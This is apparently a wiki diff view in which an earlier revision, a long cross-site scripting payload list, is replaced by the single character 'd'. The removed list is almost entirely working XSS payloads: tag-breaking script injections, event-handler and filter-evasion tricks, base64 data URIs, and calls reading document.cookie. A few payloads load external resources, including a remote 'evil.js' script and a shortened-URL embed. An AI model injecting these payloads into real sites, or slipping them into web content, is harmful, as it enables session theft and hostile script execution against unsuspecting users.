|
|
| (One intermediate revision by the same user not shown) |
| Line 1: |
Line 1: |
| “/></a></><img src=1.gif onerror=alert(document.cookie)>
| | d |
| </script>">'><script>prompt(String.fromCharCode(88.83.83))</script>
| |
| "><option>"><button>img src=x onerror=alert(/xss/);></button></option>
| |
| </title><script>alert(/xss/)</script>
| |
| '"><script>alert(document.domain)</script>
| |
| "><iframe onclick=alert(Evan)></iframe>
| |
| </textarea>"><script>prompt(Evan)</script>
| |
| //>'>"><img src=x onerror=prompt(Evan);>
| |
| "><img src=x onerror=prompt(1)>.asd.asd
| |
| '"()&%1<ScRiPt >prompt(963191)</ScRiPt>
| |
| '"--></style></script><script>alert(/xss/)</script>
| |
| "><img src=x.png onerror=prompt("XSS");>
| |
| "><img src=x onerror=prompt(1);>
| |
| <img src=x onerror=alert(0)>
| |
| "><script>prompt(1)</script>
| |
| "/><script>alert(document.cookie);</script>
| |
| "><IMG SRC=# onmouseover="alert('xss')">
| |
| <svg onload="prompt(/xss by evan/);">
| |
| #!prettyPhoto/<a onclick="alert(/XSS by Evan/);">/
| |
| <IMG SRC="jalert('XSS');">
| |
| <IMG SRC=jalert('XSS')>
| |
| false,false,false);});alert(1); //
| |
| </title><!-- --><body onload=alert(1);></iframe src=http://google.com>-->
| |
| '"onmouseover="prompt(1)"
| |
| "><script>alert(document.domain)</script>
| |
| <script>alert(1);</script>
| |
| <script>prompt(1);</script>
| |
| <script>confirm (/xss by evan/);</script>
| |
| <script src="http://rhainfosec.com/evil.js">
| |
| <scRiPt>alert(1);</scrIPt>
| |
| <scr<script>ipt>alert(1)</scr<script>ipt>
| |
| <a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
| |
| <body/onhashchange=alert(1)><a href=#>clickit
| |
| <img/src=aaa.jpg onerror=prompt(1);>
| |
| <video src=x onerror=prompt(1);>
| |
| <audio src=x onerror=prompt(1);>
| |
| <iframesrc="javascript:alert(2)">
| |
| <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
| |
| <embed/src=//goo.gl/nlX0P>
| |
| <form action="Javascript:alert(1)"><input type=submit>
| |
| <isindex action="javascript:alert(1)" type=image>
| |
| <isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
| |
| <isindex action=data:text/html, type=image>
| |
| <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
| |
| <isindexformaction="javascript:alert(1)" type=image>
| |
| <input type="image" formaction=JaVaScript:alert(0)>
| |
| <form><button formaction=javascript:alert(/xssbyevan/)>CLICKME
| |
| <object/data=//goo.gl/nlX0P?
| |
| <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
| |
| <applet code="javascript:confirm(document.cookie);">
| |
| <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
| |
| <svg/onload=prompt(1);>
| |
| <marquee/onstart=confirm(2)>/
| |
| <body onload=prompt(1);>
| |
| <select autofocus onfocus=alert(1)>
| |
| <textarea autofocus onfocus=alert(1)>
| |
| <keygen autofocus onfocus=alert(1)>
| |
| <video><source onerror="javascript:alert(1)">
| |
| <q/oncut=alert(1)>
| |
| <q/oncut=open()>
| |
| <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
| |
| <a onmouseover="javascript:window.onerror=alert;throw 1>
| |
| <img src=x onerror="javascript:window.onerror=alert;throw 1">
| |
| <a onmouseover=location=’javascript:alert(1)>click
| |
| <body onfocus="location='javascrpt:alert(1) >123
| |
| <svg><script>alert(/1/)</script>
| |
| <meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>
| |
| <math><a xlink:href="//jsfiddle.net/t846h/">click
| |
| <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg>
| |
| <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
| |
| <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
| |
| <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
| |
| <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
| |
| " autofocusonfocus=alert(1)//
| |
| " onmouseover="prompt(0) x="
| |
| " onfocusin=alert(1) autofocus x="
| |
| " onfocusout=alert(1) autofocus x="
| |
| " onblur=alert(1) autofocus a="
| |
| ";alert(1)//
| |
| "/></script><svg onload='-/"/-prompt(/xss by evan/)//'
| |
| "><img src=x <img src=x onerror=prompt(7)>=<img src=x onerror=prompt(7)>(1)>
| |
| <img src="<img src=search"/onerror=alert("xss")//">
| |
| "><h1 ondblclick=prompt(document.domain)>xss by evan</h1>
| |
| ';prompt(String.fromCharCode(120,+115,+115))//\';
| |
| <iframe\uB\uC\uAsrc\uB\uC\uA=\uB\uC\uA "javascript:alert(1);">
| |
| <><><><><><a onmouseover=prompt(1337)>XSS</a>
| |
| <a href="java%1B(Jscript:alert(1)">test
| |
| ');alert(document.cookie)//
| |
| "></iframe><script>alert(document.cookie)</script>xss
| |
| '+prompt(9)+'
| |
| <input type="hidden" name="asdhakjshdkjashdkjashd" value="\" onload=confirm(000) />" />
| |
| javascript:alert(1);
| |
